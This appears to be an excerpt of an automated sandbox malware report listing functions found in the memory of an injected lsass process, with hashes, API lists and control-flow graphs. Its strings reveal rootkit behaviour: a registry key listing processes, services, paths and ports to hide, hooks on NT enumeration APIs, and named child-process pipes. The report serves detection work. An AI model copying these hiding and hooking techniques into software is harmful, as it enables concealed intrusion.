                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                                                                                                                • String ID: SOFTWARE\wzconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                                                                                                                • API String ID: 106492572-440640706
                                                                                                                                                                                                                                                • Opcode ID: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
                                                                                                                                                                                                                                                • Instruction ID: 5e63b444e4f81cac1bc996d5a412164adaeb3b3d7e52fbd52ab2f007730aeba3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57710B3A318F5985EB209F66F8506D93374FF95B88F481121DA4E47B6ADF74C486C780
                                                                                                                                                                                                                                                Function 0000017D2DD512BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 2005889112-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
                                                                                                                                                                                                                                                • Instruction ID: 33ae801fa1b3165cb9d5bb43ea7dda0d2e83df6727d4b75619c767e92f57e636
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD513B36208F8886EB54CF62F54839AB7B5FB89B99F084124DA494775ADF7CC086C780
                                                                                                                                                                                                                                                Function 0000017D2DD51D1C Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                                                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                                                                                                                • API String ID: 4175298099-1975688563
                                                                                                                                                                                                                                                • Opcode ID: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
                                                                                                                                                                                                                                                • Instruction ID: b99ff1446e92c8109a6055d4f7fc4468c0205d9dd8ae17204e4a0a833e0fa6a2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53314DB9209F8EA4FA05EB6AF8517D46731AF44398F8C8457940D061679FB892CFC3D0
                                                                                                                                                                                                                                                Function 0000017D2DD5D398 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0000017D2DD5D3A7
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D3BC
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D3DD
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D40A
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D41B
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D42C
                                                                                                                                                                                                                                                • SetLastError.KERNEL32 ref: 0000017D2DD5D447
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D47D
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,00000001,0000017D2DD5F23C,?,?,?,?,0000017D2DD5C50F,?,?,?,?,?,0000017D2DD57AC0), ref: 0000017D2DD5D49C
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD5DC3C: HeapAlloc.KERNEL32 ref: 0000017D2DD5DC91
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D4C4
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD5DCB4: HeapFree.KERNEL32 ref: 0000017D2DD5DCCA
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD5DCB4: GetLastError.KERNEL32 ref: 0000017D2DD5DCD4
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D4D5
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000017D2DD60FDB,?,?,?,0000017D2DD609CC,?,?,?,0000017D2DD5CDBF), ref: 0000017D2DD5D4E6
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 570795689-0
                                                                                                                                                                                                                                                • Opcode ID: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
                                                                                                                                                                                                                                                • Instruction ID: f342d48d64a70e30c132d12ea025a39a7379fc3ada3b3726e1369fe98b1ce1df
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49413E3020DF4C82FE58A73579513F92276AF457B4F5C0724E97E4A6DBDEA8A4C34221
                                                                                                                                                                                                                                                Function 0000017D2DD5224C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                                                                                                                                • String ID: \\.\pipe\wzchildproc32$\\.\pipe\wzchildproc64
                                                                                                                                                                                                                                                • API String ID: 2171963597-1908187885
                                                                                                                                                                                                                                                • Opcode ID: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
                                                                                                                                                                                                                                                • Instruction ID: 25127506bbc582b8b19cf647224e3e32b237d016ff1f39aa22e8fa49ee2c4d4f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86214135618B8883F710CB25F44479977B0FB8A7A5F544215EA5D42BA9CF7CC18ACB80
                                                                                                                                                                                                                                                Function 0000017D2DD29EF0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 505 17d2dd29ef0-17d2dd29f57 call 17d2dd2ae08 508 17d2dd29f5d-17d2dd29f60 505->508 509 17d2dd2a3b8-17d2dd2a3bf call 17d2dd2c0b8 505->509 508->509 510 17d2dd29f66-17d2dd29f6c 508->510 512 17d2dd29f72-17d2dd29f76 510->512 513 17d2dd2a03b-17d2dd2a04d 510->513 512->513 517 17d2dd29f7c-17d2dd29f87 512->517 515 17d2dd2a053-17d2dd2a057 513->515 516 17d2dd2a308-17d2dd2a30c 513->516 515->516 518 17d2dd2a05d-17d2dd2a068 515->518 520 17d2dd2a30e-17d2dd2a315 516->520 521 17d2dd2a345-17d2dd2a34f call 17d2dd28004 516->521 517->513 519 17d2dd29f8d-17d2dd29f92 517->519 518->516 522 17d2dd2a06e-17d2dd2a075 518->522 519->513 523 17d2dd29f98-17d2dd29fa2 call 17d2dd28004 519->523 520->509 524 17d2dd2a31b-17d2dd2a340 call 17d2dd2a3c0 520->524 521->509 531 17d2dd2a351-17d2dd2a370 call 17d2dd26d50 521->531 526 17d2dd2a07b-17d2dd2a0b6 call 17d2dd291a0 522->526 527 17d2dd2a239-17d2dd2a245 522->527 523->531 539 17d2dd29fa8-17d2dd29fd3 call 17d2dd28004 * 2 call 17d2dd294a8 523->539 524->521 526->527 543 17d2dd2a0bc-17d2dd2a0c5 526->543 527->521 532 17d2dd2a24b-17d2dd2a24f 527->532 536 17d2dd2a25f-17d2dd2a267 532->536 537 17d2dd2a251-17d2dd2a25d call 17d2dd29468 532->537 536->521 542 17d2dd2a26d-17d2dd2a27a call 17d2dd29040 536->542 537->536 549 17d2dd2a280-17d2dd2a288 537->549 572 17d2dd29ff3-17d2dd29ffd call 17d2dd28004 539->572 573 17d2dd29fd5-17d2dd29fd9 539->573 542->521 542->549 547 17d2dd2a0ca-17d2dd2a0fc 543->547 551 17d2dd2a102-17d2dd2a10e 547->551 552 17d2dd2a228-17d2dd2a22f 547->552 555 17d2dd2a28e-17d2dd2a292 549->555 556 17d2dd2a39b-17d2dd2a3b7 call 17d2dd28004 * 2 call 17d2dd2c018 549->556 551->552 557 17d2dd2a114-17d2dd2a12d 551->557 552->547 554 17d2dd2a235 552->554 554->527 560 17d2dd2a294-17d2dd2a2a3 call 17d2dd29468 555->560 561 17d2dd2a2a5 555->561 556->509 563 17d2dd2a133-17d2dd2a178 call 17d2dd2947c * 2 557->563 564 17d2dd2a225 557->564 567 17d2dd2a2a8-17d2dd2a2b2 call 17d2dd2aea0 560->567 561->567 587 17d2dd2a1b6-17d2dd2a1bc 563->587 588 17d2dd2a17a-17d2dd2a1a0 call 17d2dd2947c call 17d2dd2a630 563->588 564->552 567->521 584 17d2dd2a2b8-17d2dd2a306 call 17d2dd290d0 call 17d2dd292d4 567->584 572->513 590 17d2dd29fff-17d2dd2a01f call 17d2dd28004 * 2 call 17d2dd2aea0 572->590 573->572 578 17d2dd29fdb-17d2dd29fe6 573->578 578->572 583 17d2dd29fe8-17d2dd29fed 578->583 583->509 583->572 584->521 594 17d2dd2a220 587->594 595 17d2dd2a1be-17d2dd2a1c2 587->595 604 17d2dd2a1a2-17d2dd2a1b4 588->604 605 17d2dd2a1c7-17d2dd2a21b call 17d2dd29e1c 588->605 609 17d2dd2a021-17d2dd2a02b call 17d2dd2af90 590->609 610 17d2dd2a036 590->610 594->564 595->563 604->587 604->588 605->594 613 17d2dd2a031-17d2dd2a394 call 17d2dd27c64 call 17d2dd2a9ec call 17d2dd27e58 609->613 614 17d2dd2a395-17d2dd2a39a call 17d2dd2c018 609->614 610->513 613->614 614->556
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2672695610.0000017D2DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd20000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction ID: f1b2e66ae6bc37b8342484b90d8886f71c9a8eb152aeb9d45bfa4c0d700f0494
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6AD18B72608B888AFB609B65A5883DD77B0FB45798F081216EE8D57B9BDB34C5D2C700
                                                                                                                                                                                                                                                Function 0000017D2DD5AAF0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 624 17d2dd5aaf0-17d2dd5ab57 call 17d2dd5ba08 627 17d2dd5ab5d-17d2dd5ab60 624->627 628 17d2dd5afb8-17d2dd5afbf call 17d2dd5ccb8 624->628 627->628 629 17d2dd5ab66-17d2dd5ab6c 627->629 631 17d2dd5ab72-17d2dd5ab76 629->631 632 17d2dd5ac3b-17d2dd5ac4d 629->632 631->632 636 17d2dd5ab7c-17d2dd5ab87 631->636 634 17d2dd5ac53-17d2dd5ac57 632->634 635 17d2dd5af08-17d2dd5af0c 632->635 634->635 637 17d2dd5ac5d-17d2dd5ac68 634->637 639 17d2dd5af0e-17d2dd5af15 635->639 640 17d2dd5af45-17d2dd5af4f call 17d2dd58c04 635->640 636->632 638 17d2dd5ab8d-17d2dd5ab92 636->638 637->635 641 17d2dd5ac6e-17d2dd5ac75 637->641 638->632 642 17d2dd5ab98-17d2dd5aba2 call 17d2dd58c04 638->642 639->628 643 17d2dd5af1b-17d2dd5af40 call 17d2dd5afc0 639->643 640->628 653 17d2dd5af51-17d2dd5af70 call 17d2dd57950 640->653 645 17d2dd5ae39-17d2dd5ae45 641->645 646 17d2dd5ac7b-17d2dd5acb6 call 17d2dd59da0 641->646 642->653 657 17d2dd5aba8-17d2dd5abd3 call 17d2dd58c04 * 2 call 17d2dd5a0a8 642->657 643->640 645->640 650 17d2dd5ae4b-17d2dd5ae4f 645->650 646->645 661 17d2dd5acbc-17d2dd5acc5 646->661 654 17d2dd5ae51-17d2dd5ae5d call 17d2dd5a068 650->654 655 17d2dd5ae5f-17d2dd5ae67 650->655 654->655 668 17d2dd5ae80-17d2dd5ae88 654->668 655->640 660 17d2dd5ae6d-17d2dd5ae7a call 17d2dd59c40 655->660 693 17d2dd5abf3-17d2dd5abfd call 17d2dd58c04 657->693 694 17d2dd5abd5-17d2dd5abd9 657->694 660->640 660->668 666 17d2dd5acca-17d2dd5acfc 661->666 670 17d2dd5ad02-17d2dd5ad0e 666->670 671 17d2dd5ae28-17d2dd5ae2f 666->671 673 17d2dd5ae8e-17d2dd5ae92 668->673 674 17d2dd5af9b-17d2dd5afb7 call 17d2dd58c04 * 2 call 17d2dd5cc18 668->674 670->671 675 17d2dd5ad14-17d2dd5ad2d 670->675 671->666 677 17d2dd5ae35 671->677 678 17d2dd5ae94-17d2dd5aea3 call 17d2dd5a068 673->678 679 17d2dd5aea5 673->679 674->628 681 17d2dd5ad33-17d2dd5ad78 call 17d2dd5a07c * 2 675->681 682 17d2dd5ae25 675->682 677->645 687 17d2dd5aea8-17d2dd5aeb2 call 17d2dd5baa0 678->687 679->687 706 17d2dd5ad7a-17d2dd5ada0 call 17d2dd5a07c call 17d2dd5b230 681->706 707 17d2dd5adb6-17d2dd5adbc 681->707 682->671 687->640 701 17d2dd5aeb8-17d2dd5af06 call 17d2dd59cd0 call 17d2dd59ed4 687->701 693->632 709 17d2dd5abff-17d2dd5ac1f call 17d2dd58c04 * 2 call 17d2dd5baa0 693->709 694->693 696 17d2dd5abdb-17d2dd5abe6 694->696 696->693 702 17d2dd5abe8-17d2dd5abed 696->702 701->640 702->628 702->693 723 17d2dd5ada2-17d2dd5adb4 706->723 724 17d2dd5adc7-17d2dd5ae1b call 17d2dd5aa1c 706->724 713 17d2dd5adbe-17d2dd5adc2 707->713 714 17d2dd5ae20 707->714 728 17d2dd5ac21-17d2dd5ac2b call 17d2dd5bb90 709->728 729 17d2dd5ac36 709->729 713->681 714->682 723->706 723->707 724->714 732 17d2dd5ac31-17d2dd5af94 call 17d2dd58864 call 17d2dd5b5ec call 17d2dd58a58 728->732 733 17d2dd5af95-17d2dd5af9a call 17d2dd5cc18 728->733 729->632 732->733 733->674
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction ID: f8fb045fb90e4a2d3b997f1db0de6407844043880da660533e616368e6afbf85
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26D19E7260CB988AEB609F65E4403ED77B0FB45788F081106EE8D57B96DB74E4DAC700
                                                                                                                                                                                                                                                Function 0000017D2DD5F904 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                • Opcode ID: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction ID: 5472dc4859f2ec678e8526d892e9dc35e12882832a061a9c28273b9cf07cc402
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B041B032319F4851FA25CB66B8047D522B5FF89BE0F4D52259D0D9B786EB79C4C68340
                                                                                                                                                                                                                                                Function 0000017D2DD5104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 3743429067-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction ID: 7ceb33411e866d5e6bad0885634960f762de516c8c48caabf9af1da6179ea09c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35415F36218F84C6E760CF61F44479A77B1F789B98F088129DA8947759DF7CC48ACB80
                                                                                                                                                                                                                                                Function 0000017D2DD5D5D8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,0000017D2DD5CD4E,?,?,?,?,?,?,?,?,0000017D2DD5D50D,?,?,00000001), ref: 0000017D2DD5D5F7
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000017D2DD5CD4E,?,?,?,?,?,?,?,?,0000017D2DD5D50D,?,?,00000001), ref: 0000017D2DD5D616
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000017D2DD5CD4E,?,?,?,?,?,?,?,?,0000017D2DD5D50D,?,?,00000001), ref: 0000017D2DD5D63E
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000017D2DD5CD4E,?,?,?,?,?,?,?,?,0000017D2DD5D50D,?,?,00000001), ref: 0000017D2DD5D64F
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000017D2DD5CD4E,?,?,?,?,?,?,?,?,0000017D2DD5D50D,?,?,00000001), ref: 0000017D2DD5D660
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID: 1%$Y%
                                                                                                                                                                                                                                                • API String ID: 3702945584-1395475152
                                                                                                                                                                                                                                                • Opcode ID: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction ID: 2491d24410cb46268f94260e2639c8758f3e2d5a9eecc6da8c164988f1d14004
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA114C3060DB4C81FE58A73279613E922B2AF447E0F1C4324E97D4A6DBDEA8D4C38311
                                                                                                                                                                                                                                                Function 0000017D2DD26920 Relevance: 12.2, APIs: 8, Instructions: 228COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2672695610.0000017D2DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd20000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: 14a86301810562fa968fb798af1d75a374cb01e83c23393911485301656b1b25
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B81A37960CF8D86FA64AB65B8493D966B0AF85780F5C8525AE0C4779FDB38CCC78700
                                                                                                                                                                                                                                                Function 0000017D2DD57520 Relevance: 12.2, APIs: 8, Instructions: 228COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: ca403a1a5602c85c8bb9038eef2cd80d17c8cae6d6c05ab0e2c7db901c7f5f0a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C981BF31A1CF4DA6FB70AB65B4413E926B0AF85B80F6C4055EA0D47797EBB8C9C78740
                                                                                                                                                                                                                                                Function 0000017D2DD5A148 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
